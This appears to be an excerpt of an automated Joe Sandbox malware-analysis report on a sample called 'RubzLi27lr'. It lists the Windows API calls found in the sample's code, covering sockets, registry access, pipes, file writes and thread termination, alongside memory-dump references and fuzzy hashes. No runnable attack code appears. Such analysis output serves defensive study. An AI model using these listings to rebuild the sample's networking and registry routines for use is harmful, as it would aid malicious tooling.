                                                                                                                  • WriteFile.KERNEL32(?,00AF3CD6,00000000,00AE5BA3,00000000,?,?,?,?,?,?,?,?,?,00AE5BA3,?), ref: 00AE554B
                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,00AE5BA3,00000000,?,?,?,?,?,?,?,?,?,00AE5BA3,?), ref: 00AE5584
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1324828854-0
                                                                                                                  • Opcode ID: 2b834c8fe09206eb8cc51efa1f0d7c3e239a23de31a0089d5d771f7c837cd10b
                                                                                                                  • Instruction ID: 41108ff56d4a71d23c1713041c8ddf0a0be92b99ad1308abb3c26406da2503ec
                                                                                                                  • Opcode Fuzzy Hash: 2b834c8fe09206eb8cc51efa1f0d7c3e239a23de31a0089d5d771f7c837cd10b
                                                                                                                  • Instruction Fuzzy Hash: 1851B371E00689AFDB10CFB9E845AEEBBF9EF09304F14415AF555E7291D7309A41CB60
                                                                                                                  APIs
                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00AD2D4B
                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00AD2D53
                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00AD2DE1
                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00AD2E0C
                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 00AD2E61
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                  • String ID: csm
                                                                                                                  • API String ID: 1170836740-1018135373
                                                                                                                  • Opcode ID: 2e38d395779904f264445258fe9e8b9dfe154fb665ea2d289783b95978af3bff
                                                                                                                  • Instruction ID: a631aa8298e4507b582c045ef4d1ddcd688da8b136c778aa75585869caf9da72
                                                                                                                  • Opcode Fuzzy Hash: 2e38d395779904f264445258fe9e8b9dfe154fb665ea2d289783b95978af3bff
                                                                                                                  • Instruction Fuzzy Hash: AE41A335A00209ABCF10DF68C845B9EBFB5BF54324F148196E8566B392DB31AE05CBD1
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00B3304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00B3307A
                                                                                                                    • Part of subcall function 00B3304E: _wcslen.LIBCMT ref: 00B3309B
                                                                                                                  • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00B31112
                                                                                                                  • WSAGetLastError.WSOCK32 ref: 00B31121
                                                                                                                  • WSAGetLastError.WSOCK32 ref: 00B311C9
                                                                                                                  • closesocket.WSOCK32(00000000), ref: 00B311F9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2675159561-0
                                                                                                                  • Opcode ID: 7fe681a00daaa74a8619dc0c8528991b76f922498fde7348dfad1664b52e4f38
                                                                                                                  • Instruction ID: bb066e0b5db23870e454008fe9ca8f6ab8623e78f3d1aff3e5bf7483b9dc91f8
                                                                                                                  • Opcode Fuzzy Hash: 7fe681a00daaa74a8619dc0c8528991b76f922498fde7348dfad1664b52e4f38
                                                                                                                  • Instruction Fuzzy Hash: AB41F935600604AFD7109F18C885BE9BBEDFF45724F248595FD05AB291CB70AE41CBE1
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00B1DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B1CF22,?), ref: 00B1DDFD
                                                                                                                    • Part of subcall function 00B1DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00B1CF22,?), ref: 00B1DE16
                                                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00B1CF45
                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 00B1CF7F
                                                                                                                  • _wcslen.LIBCMT ref: 00B1D005
                                                                                                                  • _wcslen.LIBCMT ref: 00B1D01B
                                                                                                                  • SHFileOperationW.SHELL32(?), ref: 00B1D061
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                                  • String ID: \*.*
                                                                                                                  • API String ID: 3164238972-1173974218
                                                                                                                  • Opcode ID: d8fff306e5b39430295ac98b5c9ece97c36616ffebd55d658bb87d0488c3f13f
                                                                                                                  • Instruction ID: 628efb422f29ae71dd91ae29c3e56bfe1dedca4564de46b1141ace14f507f262
                                                                                                                  • Opcode Fuzzy Hash: d8fff306e5b39430295ac98b5c9ece97c36616ffebd55d658bb87d0488c3f13f
                                                                                                                  • Instruction Fuzzy Hash: DC4134719452195FDF12EFA4DA81ADEBBF9AF08340F5000E6E509EB142EA34E789CB50
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00B42E1C
                                                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00B42E4F
                                                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00B42E84
                                                                                                                  • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00B42EB6
                                                                                                                  • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00B42EE0
                                                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00B42EF1
                                                                                                                  • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00B42F0B
                                                                                                                  Similarity
                                                                                                                  • API ID: LongWindow$MessageSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2178440468-0
                                                                                                                  • Opcode ID: e50cfa18b5ede03cabaf2782766b0bddedca4ee84c3f36b9d7c59329834086c2
                                                                                                                  • Instruction ID: 38db736c9df45ebfb0ac895428e5a3ddb86e4e2840c08351b782aee4afde7b2d
                                                                                                                  • Opcode Fuzzy Hash: e50cfa18b5ede03cabaf2782766b0bddedca4ee84c3f36b9d7c59329834086c2
                                                                                                                  • Instruction Fuzzy Hash: AC311534686141AFDB20CF5CDC85F6537E4FB8AB10F9501A4F9148B2B2CB71AE41EB01
                                                                                                                  APIs
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B17769
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B1778F
                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 00B17792
                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 00B177B0
                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 00B177B9
                                                                                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 00B177DE
                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 00B177EC
                                                                                                                  Similarity
                                                                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3761583154-0
                                                                                                                  • Opcode ID: eb61d3beb0a9a01caea9a7eee82a8071f29b71c9e9d17f3bd1171a8b934088fc
                                                                                                                  • Instruction ID: c05c827434b7c065c646e11b7be10b65609b089e1de3818fa494c8c20266cdd8
                                                                                                                  • Opcode Fuzzy Hash: eb61d3beb0a9a01caea9a7eee82a8071f29b71c9e9d17f3bd1171a8b934088fc
                                                                                                                  • Instruction Fuzzy Hash: 0A21D13A604219AFDF00DFA8CC88CFB77ECFB09760B408065B915DB290DA70DD8187A0
                                                                                                                  APIs
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B17842
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B17868
                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 00B1786B
                                                                                                                  • SysAllocString.OLEAUT32 ref: 00B1788C
                                                                                                                  • SysFreeString.OLEAUT32 ref: 00B17895
                                                                                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 00B178AF
                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 00B178BD
                                                                                                                  Similarity
                                                                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3761583154-0
                                                                                                                  • Opcode ID: 94f27db5d197089d45e66866dc2b10bc5d1571db2b9c2a2fe874e0b92491c318
                                                                                                                  • Instruction ID: 8812ea51237ecb8821493df9baa96956770be9c7489497f361430a3ca9bb4505
                                                                                                                  • Opcode Fuzzy Hash: 94f27db5d197089d45e66866dc2b10bc5d1571db2b9c2a2fe874e0b92491c318
                                                                                                                  • Instruction Fuzzy Hash: 1321A936608204AF9B10AFA9CC8CDEA7BFCFB097607508065B915CB2A1DA74DD81CB74
                                                                                                                  APIs
                                                                                                                  • GetStdHandle.KERNEL32(0000000C), ref: 00B204F2
                                                                                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B2052E
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateHandlePipe
                                                                                                                  • String ID: nul
                                                                                                                  • API String ID: 1424370930-2873401336
                                                                                                                  • Opcode ID: 89c670593ba2e4c2885fd71bceb7f6c27b1dfd2c46f195118ca353ec1eb640d4
                                                                                                                  • Instruction ID: 5ca439c289fb2fc03a10db3de627ca599fb381133414327e4ad6b436537196dd
                                                                                                                  • Opcode Fuzzy Hash: 89c670593ba2e4c2885fd71bceb7f6c27b1dfd2c46f195118ca353ec1eb640d4
                                                                                                                  • Instruction Fuzzy Hash: 0821B4746103199FCB20AF28EC84A9A7BF4FF55720F204A59F8A5D31E1D7B09940CF60
                                                                                                                  APIs
                                                                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00B205C6
                                                                                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B20601
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateHandlePipe
                                                                                                                  • String ID: nul
                                                                                                                  • API String ID: 1424370930-2873401336
                                                                                                                  • Opcode ID: b3bc4d1f8f1c0e9ea89729513dcdde6552447009632faed0e7712a7b7b4492a8
                                                                                                                  • Instruction ID: 6752d5a8542a22acc5156de34578ce5aee49c357287a8a132b30f855dd3b7a84
                                                                                                                  • Opcode Fuzzy Hash: b3bc4d1f8f1c0e9ea89729513dcdde6552447009632faed0e7712a7b7b4492a8
                                                                                                                  • Instruction Fuzzy Hash: 5021B5355103259FDB21AF68EC44A5A77F4FF95720F200A59F8A5E32E5DBB09960CB10
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AB600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00AB604C
                                                                                                                    • Part of subcall function 00AB600E: GetStockObject.GDI32(00000011), ref: 00AB6060
                                                                                                                    • Part of subcall function 00AB600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00AB606A
                                                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00B44112
                                                                                                                  • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00B4411F
                                                                                                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00B4412A
                                                                                                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00B44139
                                                                                                                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00B44145
                                                                                                                  Strings
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                  • String ID: Msctls_Progress32
                                                                                                                  • API String ID: 1025951953-3636473452
                                                                                                                  • Opcode ID: d875c179de524c2be6b5faa18ae3fe2c7f0288af023493235caf26ead6d07672
                                                                                                                  • Instruction ID: b2d29577e8426096f3cbc090d6385c00fdb2abec3e205ed7f3773b7634e75a67
                                                                                                                  • Opcode Fuzzy Hash: d875c179de524c2be6b5faa18ae3fe2c7f0288af023493235caf26ead6d07672
                                                                                                                  • Instruction Fuzzy Hash: 0D11B6B114011DBEEF119F64CC85EE77F9DEF08798F018111BA18A6150CB729C21DBA4
APIs
  • Part of subcall function 00AED7A3: _free.LIBCMT ref: 00AED7CC
• _free.LIBCMT ref: 00AED82D
  • Part of subcall function 00AE29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00AED7D1,00000000,00000000,00000000,00000000,?,00AED7F8,00000000,00000007,00000000,?,00AEDBF5,00000000), ref: 00AE29DE
  • Part of subcall function 00AE29C8: GetLastError.KERNEL32(00000000,?,00AED7D1,00000000,00000000,00000000,00000000,?,00AED7F8,00000000,00000007,00000000,?,00AEDBF5,00000000,00000000), ref: 00AE29F0
• _free.LIBCMT ref: 00AED838
• _free.LIBCMT ref: 00AED843
• _free.LIBCMT ref: 00AED897
• _free.LIBCMT ref: 00AED8A2
• _free.LIBCMT ref: 00AED8AD
• _free.LIBCMT ref: 00AED8B8
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
• Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00B1DA74
• LoadStringW.USER32(00000000), ref: 00B1DA7B
• GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00B1DA91
• LoadStringW.USER32(00000000), ref: 00B1DA98
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 00B1DADC
Strings
• %s (%d) : ==> %s: %s %s, xrefs: 00B1DAB9
Similarity
• API ID: HandleLoadModuleString$Message
• String ID: %s (%d) : ==> %s: %s %s
• API String ID: 4072794657-3128320259
APIs
• InterlockedExchange.KERNEL32(017DD448,017DD448), ref: 00B2097B
• EnterCriticalSection.KERNEL32(017DD428,00000000), ref: 00B2098D
• TerminateThread.KERNEL32(00000000,000001F6), ref: 00B2099B
• WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00B209A9
• CloseHandle.KERNEL32(00000000), ref: 00B209B8
• InterlockedExchange.KERNEL32(017DD448,000001F6), ref: 00B209C8
• LeaveCriticalSection.KERNEL32(017DD428), ref: 00B209CF
Similarity
• API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
• String ID:
• API String ID: 3495660284-0
APIs
• __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00B31DC0
• #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00B31DE1
• WSAGetLastError.WSOCK32 ref: 00B31DF2
• htons.WSOCK32(?,?,?,?,?), ref: 00B31EDB
• inet_ntoa.WSOCK32(?), ref: 00B31E8C
  • Part of subcall function 00B139E8: _strlen.LIBCMT ref: 00B139F2
  • Part of subcall function 00B33224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00B2EC0C), ref: 00B33240
• _strlen.LIBCMT ref: 00B31F35
Similarity
• API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
• String ID:
• API String ID: 3203458085-0
APIs
• GetClientRect.USER32(?,?), ref: 00AB5D30
• GetWindowRect.USER32(?,?), ref: 00AB5D71
• ScreenToClient.USER32(?,?), ref: 00AB5D99
• GetClientRect.USER32(?,?), ref: 00AB5ED7
• GetWindowRect.USER32(?,?), ref: 00AB5EF8
Similarity
• API ID: Rect$Client$Window$Screen
• String ID:
• API String ID: 1296646539-0
APIs
• __allrem.LIBCMT ref: 00AE00BA
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AE00D6
• __allrem.LIBCMT ref: 00AE00ED
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AE010B
• __allrem.LIBCMT ref: 00AE0122
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00AE0140
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
• String ID:
• API String ID: 1992179935-0
APIs
• MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00AD82D9,00AD82D9,?,?,?,00AE644F,00000001,00000001,8BE85006), ref: 00AE6258
• MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00AE644F,00000001,00000001,8BE85006,?,?,?), ref: 00AE62DE
• WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00AE63D8
• __freea.LIBCMT ref: 00AE63E5
  • Part of subcall function 00AE3820: RtlAllocateHeap.NTDLL(00000000,?,00B81444,?,00ACFDF5,?,?,00ABA976,00000010,00B81440,00AB13FC,?,00AB13C6,?,00AB1129), ref: 00AE3852
• __freea.LIBCMT ref: 00AE63EE
• __freea.LIBCMT ref: 00AE6413
Similarity
• API ID: ByteCharMultiWide__freea$AllocateHeap
• String ID:
• API String ID: 1414292761-0
APIs
  • Part of subcall function 00AB9CB3: _wcslen.LIBCMT ref: 00AB9CBD
  • Part of subcall function 00B3C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B3B6AE,?,?), ref: 00B3C9B5
  • Part of subcall function 00B3C998: _wcslen.LIBCMT ref: 00B3C9F1
  • Part of subcall function 00B3C998: _wcslen.LIBCMT ref: 00B3CA68
  • Part of subcall function 00B3C998: _wcslen.LIBCMT ref: 00B3CA9E
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B3BCCA
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B3BD25
• RegCloseKey.ADVAPI32(00000000), ref: 00B3BD6A
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00B3BD99
• RegCloseKey.ADVAPI32(?,?,00000000), ref: 00B3BDF3
• RegCloseKey.ADVAPI32(?), ref: 00B3BDFF
Memory Dump Source
• Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1120388591-0
                                                                                                                  APIs
                                                                                                                  • VariantInit.OLEAUT32(00000035), ref: 00B0F7B9
                                                                                                                  • SysAllocString.OLEAUT32(00000001), ref: 00B0F860
                                                                                                                  • VariantCopy.OLEAUT32(00B0FA64,00000000), ref: 00B0F889
                                                                                                                  • VariantClear.OLEAUT32(00B0FA64), ref: 00B0F8AD
                                                                                                                  • VariantCopy.OLEAUT32(00B0FA64,00000000), ref: 00B0F8B1
                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00B0F8BB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3859894641-0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AB7620: _wcslen.LIBCMT ref: 00AB7625
                                                                                                                    • Part of subcall function 00AB6B57: _wcslen.LIBCMT ref: 00AB6B6A
                                                                                                                  • GetOpenFileNameW.COMDLG32(00000058), ref: 00B294E5
                                                                                                                  • _wcslen.LIBCMT ref: 00B29506
                                                                                                                  • _wcslen.LIBCMT ref: 00B2952D
                                                                                                                  • GetSaveFileNameW.COMDLG32(00000058), ref: 00B29585
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcslen$FileName$OpenSave
                                                                                                                  • String ID: X
                                                                                                                  • API String ID: 83654149-3081909835
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00AC9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00AC9BB2
                                                                                                                  • BeginPaint.USER32(?,?,?), ref: 00AC9241
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00AC92A5
                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00AC92C2
                                                                                                                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00AC92D3
                                                                                                                  • EndPaint.USER32(?,?,?,?,?), ref: 00AC9321
                                                                                                                  • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00B071EA
                                                                                                                    • Part of subcall function 00AC9339: BeginPath.GDI32(00000000), ref: 00AC9357
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3050599898-0
                                                                                                                  APIs
                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 00B2080C
                                                                                                                  • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00B20847
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 00B20863
                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00B208DC
                                                                                                                  • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00B208F3
                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00B20921
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143657913.0000000000B72000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143697585.0000000000B7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                   • Associated: 00000000.00000002.2143713517.0000000000B84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_ab0000_RubzLi27lr.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3368777196-0
                                                                                                                  APIs
                                                                                                                  • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00B0F3AB,00000000,?,?,00000000,?,00B0682C,00000004,00000000,00000000), ref: 00B4824C
                                                                                                                  • EnableWindow.USER32(00000000,00000000), ref: 00B48272
                                                                                                                  • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00B482D1
                                                                                                                  • ShowWindow.USER32(00000000,00000004), ref: 00B482E5
                                                                                                                  • EnableWindow.USER32(00000000,00000001), ref: 00B4830B
                                                                                                                  • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00B4832F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2143590187.0000000000AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true
                                                                                                                   • Associated: 00000000.00000002.2143573675.0000000000AB0000.00000002.00000001.01000000.00000003.sdmp
